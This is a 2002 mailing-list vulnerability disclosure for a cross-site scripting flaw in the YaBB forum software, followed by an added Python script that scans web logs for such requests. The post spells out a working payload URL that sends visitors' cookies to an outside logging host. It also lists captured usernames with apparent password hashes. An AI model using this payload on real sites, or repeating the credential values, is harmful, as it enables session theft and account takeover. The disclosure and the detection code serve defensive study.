OSEC

From: Fabricio Angeletti (f_a_a_at_yahoo.com)
Date: Sun Dec 01 2002 - 18:59:01 CST

    http://the.target.xxx/board/YaBB.pl?board=gral;action=display;num=10360245269>location%3d'http://www.scriptkiddie.home/x.php?Cookie%3d'%2b(document.cookie)%3b</Script>

     num is a post that doesn't exist
     board must be a valid and accessible board
     X.php is a script to log the cookie

     That is an example of the cookie:
     268: YaBBusername=HellMind; YaBBpassword=yyG8B.3TA6i6I
     272: YaBBusername=Canallaman; YaBBpassword=yypZn/JbGHTNY

     Tested in YaBB 1 Gold - SP1!

     I discovered this just now. I know it isn't much, but you can
     steal the user's identity and maybe you can try to change
     the password too (there is another old vuln, but I don't
     know if it works here).

     Sorry for my bad English

     Bye

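For defenders reviewing web server logs for requests of the kind described in the post, the following is an added example (not part of the original message and not YaBB code). It flags YaBB.pl requests whose `num` parameter is not a plain numeric post id after percent-decoding. It assumes common/combined log format and that legitimate `num` values are digits only; the function names and log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Client address and request target from a common/combined-format log entry.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_num(target):
    """Return the decoded num value if it is not a plain post id, else None."""
    path, _, query = target.partition("?")
    if not path.lower().endswith("yabb.pl"):
        return None
    # YaBB separates parameters with ';' (as in the URL in the post); accept '&' too.
    for pair in re.split(r"[;&]", query):
        name, _, value = pair.partition("=")
        if name == "num":
            decoded = unquote(unquote(value))  # decode twice to catch double encoding
            return None if re.fullmatch(r"[0-9]+", decoded) else decoded
    return None

def scan(lines):
    """Return (client, decoded num) for every request with a non-numeric num."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        value = suspicious_num(m.group(2))
        if value is not None:
            hits.append((m.group(1), value))
    return hits

# Constructed sample log lines (documentation-range addresses, harmless markup).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Dec/2002:18:40:11 -0600] "GET /board/YaBB.pl?board=gral;action=display;num=1036024526 HTTP/1.0" 200 5120',
    '192.0.2.77 - - [01/Dec/2002:18:41:02 -0600] "GET /board/YaBB.pl?board=gral;action=display;num=1036024526%3Cscript%3Ex%3C/script%3E HTTP/1.0" 200 2210',
    '192.0.2.78 - - [01/Dec/2002:18:41:30 -0600] "GET /board/YaBB.pl?board=gral;action=display;num=1036024526%253Cb%253E HTTP/1.0" 200 2210',
    '192.0.2.10 - - [01/Dec/2002:18:42:00 -0600] "GET /index.html HTTP/1.0" 200 900',
]

if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client}: non-numeric num parameter {value!r}")
```

The same digits-only check, applied server-side before `num` is echoed into the page, together with HTML-encoding of any reflected value, addresses the reflection itself.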